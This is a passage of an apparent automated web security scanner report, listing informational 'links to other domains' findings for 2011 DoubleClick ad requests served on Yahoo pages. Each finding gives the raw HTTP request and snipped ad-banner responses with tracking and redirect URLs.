Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:57 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=http%3a%2f%2fwww.comcast.com/Movers/Move.cspx%3Fdfaid%3D2199899%26cmp%3D0"><img src="http://s0.2mdn.net/2199899/Q211_CORP_AW_MOV_XF-TP_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
33263071%3B2-0%3B0%3B43807772%3B4307-300/250%3B43787172/43804959/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/4/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807772-233263071-43804959"><img src="http://s0.2mdn.net/1420759/lmb_iau_PassAgeRedTicketCNP50k_DUIRipRidEZ_RO455_0811_300x250.gif" width=300 height=250 border="0" alt="" galleryimg="no"></a>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

15.7. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
220264224%3B0-0%3B0%3B43807788%3B3454-728/90%3B43552622/43570409/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-43570409"><img src="http://s0.2mdn.net/1420759/lmb_iau_CheckAgeRangeRobertFillBd15s40k_DynStRidEasy_0811_728x90.gif" width=728 height=90 border="0" alt="" galleryimg="no"></a>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

15.8. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
8925.3243961%3Furl%3Dhttp://www.grilling.com/offers/kcm2offerribs?utm_medium=paid-media&utm_campaign=fy12+jas+kc+masterpiece&utm_content=65761146&utm_term=41307257&utm_source=N3340.dedicatedmedia.com"><img src="http://s0.2mdn.net/1261211/ribs coupon_300x250_Mar2011.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.9. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.101

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.101;sz=200x33;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 938
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3b7a/4/20b/%2a/l;234033357;0-0;0;68150974;3011-200/33;39925598/39943385/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=trade_with_online_leader&SC=S047401&ch_id=D&s_id=YHOO&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_TradeFree_60Days_200x33.gif" border=0 alt="Advertisement"></a>

15.10. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.102

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.102;sz=120x30;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313052? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 936
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3b7a/4/20b/%2a/d;234033383;0-0;0;68150985;47-120/30;39755442/39773229/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=trade_with_online_leader&SC=S047401&ch_id=D&s_id=YHOO&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_TradeFree_60Days_120x30.gif" border=0 alt="Advertisement"></a>

15.11. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6067.160910.7443114402621/B5129127.36

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 12:48:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 1684
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=B-pnWhxZmTpD_HoHEjQSn6KCgBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gElaHR0cDovL2ZpbmFuY2UueWFob28uY29tL2xvb2t1cD9zPXhzc8ACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_3-vY6ePPfZqy3yfT7f37tFysnlxg&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk" target="_blank">
<img src="http://s1.2mdn.net/3017628/120x60_stk395_oldGrnBlkBttn.gif" border="0" alt=""/></a>
...[SNIP]...

15.12. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6067.160910.7443114402621/B5129127.36

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 12:48:16 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 1834
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk" target="_blank">
<img src="http://s1.2mdn.net/3017628/120x60_stk395_oldGrnBlkBttn.gif" border="0" alt=""/></a>
...[SNIP]...

15.13. http://ad.doubleclick.net/adj/N3880.SD153730.3880/B5030675.119

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.SD153730.3880/B5030675.119

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adj/N3880.SD153730.3880/B5030675.119;dcove=o;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15vouek28/M=601209074.601714782.559298051.559295551/D=autos/S=96432900:LREC/Y=YAHOO/EXP=1315320341/L=XXxF8WKIR.bpARpjTl.wjQdiMhd7ak5mFfQADyzO/B=7FMXO0wNPEo-/J=1315313141053925/K=IjhCpA3igfxfZpP_HdMwtQ/A=2402166838162982702/R=1/X=3/*;ord=1315313141053925? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/darla/md.php?en=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37990
Date: Tue, 06 Sep 2011 12:45:42 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
document.write('<A TARGET="_blank" HREF="http://global.ard.yahoo.com/SIG=15vouek28/M=601209074.601714782.559298051.559295551/D=autos/S=96432900:LREC/Y=YAHOO/EXP=1315320341/L=XXxF8WKIR.bpARpjTl.wjQdiMhd7ak5mFfQADyzO/B=7FMXO0wNPEo-/J=1315313141053925/K=IjhCpA3igfxfZpP_HdMwtQ/A=2402166838162982702/R=1/X=3/*http://ad.doubleclick.net/activity;src%3D1659518%3Bmet%3D1%3Bv%3D1%3Bpid%3D59783911%3Baid%3D234411781%3Bko%3D0%3Bcid%3D42288790%3Brid%3D42306577%3Brv%3D2%3Bcs%3Dr%3Beid1%3D566971%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/108/%2a/x%3B234411781%3B4-0%3B0%3B59783911%3B4307-300/250%3B42288790/42306577/2%3B%3B%7Efdr%3D236038744%3B0-0%3B0%3B57126021%3B4307-300/250%3B40592756/40610543/1%3B%3B%7Esscs%3D%3fhttp://www.chevrolet.com/experience/fuel-efficiency/"><IMG SRC="http://s0.2mdn.net/1659518/PID_1675096_CHV_2011_MPG_Calculator_300x250.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.14. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTg2bTdrZShnaWQkc1hOamdHS0lQRTdwQVJwalRsLndqUU1tTWhkN2FrNW1Gb2dBQk1XQSxzdCQxMzE1MzEzMjg4MzcxODkyLHNpJDQ0NTc1NTEsdiQxLjAsYWlkJGFMZzZGa1BEbUxNLSxjdCQyNSx5YngkVXBnUmlkaE9ZWXZFcmhDZkcuSVhYdyxyJDAscmQkMTZpbmdndWY3KSk/1/*http://global.ard.yahoo.com/SIG=15kie638h/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=aLg6FkPDmLM-/J=1315313288456508/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=3672358318799275418/R=0/X=6/*;ord=1315313288.456508? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 39289
Date: Tue, 06 Sep 2011 12:48:09 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
